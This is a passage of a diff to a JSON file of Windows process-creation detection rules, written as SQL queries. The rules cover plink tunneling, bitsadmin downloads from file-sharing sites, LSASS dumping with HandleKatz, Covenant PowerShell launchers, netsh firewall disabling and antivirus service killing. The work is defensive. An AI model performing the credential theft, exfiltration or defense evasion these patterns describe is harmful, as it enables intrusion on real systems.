(CommandLine LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.WindowsTerminal\\_%' ESCAPE '\\' AND CommandLine LIKE '%\\\\LocalState\\\\settings.json%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Common7\\\\Tools\\\\VsDevCmd.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_windows_terminal_susp_children.yml" + "filename": "proc_creation_win_exploit_cve_2019_1378.yml" }, { - "title": "Suspicious HWP Sub Processes", - "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", + "title": "Potential RDP Tunneling Via SSH Plink", + "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", "status": "test", - "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "description": "Execution of plink to perform data exfiltration and tunneling", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1203", - "attack.t1059.003", - "attack.g0032" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND 
NewProcessName LIKE '%\\\\gbb.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hwp_exploits.yml" + "filename": "proc_creation_win_plink_susp_tunneling.yml" }, { - "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", - "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", + "title": "Suspicious Scheduled Task Creation Involving Temp Folder", + "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", "status": "test", - "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" + "attack.t1053.005" ], - "filename": "proc_creation_win_schtasks_reg_loader.yml" - }, - { - "title": "HackTool - PCHunter Execution", - "id": 
"fca949cc-79ca-446e-8064-01aa7e52ece5", - "status": "experimental", - "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unlikely" + "Administrative activity", + "Software installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND 
CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_pchunter.yml" + "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" }, { - "title": "Taskkill Symantec Endpoint Protection", - "id": "4a6713f6-3331-11ed-a261-0242ac120002", - "status": "experimental", - "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", - "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", + "title": "Firewall Disabled via Netsh.EXE", + "id": "57c4bf16-227f-4394-8ec7-1b745ee061c3", + "status": "test", + "description": "Detects netsh commands that turns off the Windows firewall", + "author": "Fatih Sirin", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.004", + "attack.s0108" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%opmode%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%state%' ESCAPE '\\' AND CommandLine LIKE '%off%' ESCAPE 
'\\')))" ], - "filename": "proc_creation_win_taskkill_sep.yml" + "filename": "proc_creation_win_netsh_fw_disable.yml" }, { - "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", - "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", + "title": "Suspicious Calculator Usage", + "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", + "status": "test", + "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1036" ], "falsepositives": [ - "Some legitimate apps use this, but limited." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' 
ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" + "filename": "proc_creation_win_susp_calc.yml" }, { - "title": "Abused Debug Privilege by Arbitrary Parent Processes", - "id": "d522eca2-2973-4391-a3e0-ef0374321dae", - "status": "test", - "description": "Detection of unusual child processes by different system processes", - "author": "Semanur Guneysu @semanurtg, oscd.community", + "title": "Windows Share Mount Via Net.EXE", + "id": "f117933c-980c-4f78-b384-e3d838111165", + "status": "experimental", + "description": "Detects when a share is mounted using the \"net.exe\" utility", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Legitimate activity by administrators and scripts" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE 
'\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" + "filename": "proc_creation_win_net_use_mount_share.yml" }, { - "title": "HackTool - HandleKatz LSASS Dumper Execution", - "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", - "status": "experimental", - "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "title": "Suspicious Rundll32 Invoking Inline VBScript", + "id": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", + "status": "test", + "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE 
'\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_handlekatz.yml" + "filename": "proc_creation_win_rundll32_inline_vbs.yml" }, { - "title": "Privilege Escalation via Named Pipe Impersonation", - "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "title": "Suspicious Sysmon as Execution Parent", + "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", "status": "experimental", - "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", - "author": "Tim Rauch", - "tags": [ - "attack.lateral_movement", - "attack.t1021" - ], + "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. 
CVE-2022-41120)", + "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" + "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" }, { - "title": "Potential Arbitrary Command Execution Using Msdt.EXE", - "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", + "title": "Use of Setres.exe", + "id": "835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", "status": "experimental", - "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of Setres.exe to set the screen resolution and then 
potentially launch a file named \"choice\" (with any executable extension such as \".cmd\" or \".exe\") from the current execution path", + "author": "@gott_cyber", "tags": [ "attack.defense_evasion", + "attack.t1218", "attack.t1202" ], "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" - }, - { - "title": "Suspicious X509Enrollment - Process Creation", - "id": "114de787-4eb2-48cc-abdb-c0b449f93ea4", - "status": "experimental", - "description": "Detect use of X509Enrollment", - "author": "frack113", - "falsepositives": [ - "Legitimate administrative script" + "Legitimate usage of Setres" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR CommandLine LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\setres.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\choice' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_x509enrollment.yml" + "filename": "proc_creation_win_lolbin_setres.yml" }, { - "title": "HackTool - Covenant PowerShell Launcher", - "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", + "title": "Rundll32 Registered COM Objects", + "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", "status": "test", - "description": "Detects suspicious command lines used in Covenant luanchers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": 
"load malicious registered COM objects", + "author": "frack113", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1564.003" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" + ], + "falsepositives": [ + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_covenant.yml" + "filename": "proc_creation_win_rundll32_registered_com_objects.yml" }, { - "title": "System File Execution Location Anomaly", - "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", - "status": "experimental", - "description": "Detects a Windows program executable started from a suspicious folder", - "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", + "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ 
"attack.defense_evasion", - "attack.t1036" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Exotic software" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dashost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\defrag.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dwm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR 
CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_system_exe_anomaly.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" }, { - "title": "Suspicious Dump64.exe Execution", - "id": "129966c9-de17-4334-a123-8b58172e664d", + "title": "Regsvr32 Command Line Without DLL", + "id": "50919691-7302-437f-8e10-1fe088afa145", "status": "test", - "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", - "author": "Austin Songer @austinsonger, Florian Roth", + "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1574", + "attack.execution" ], "falsepositives": [ - "Dump64.exe in other folders than the excluded one" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE 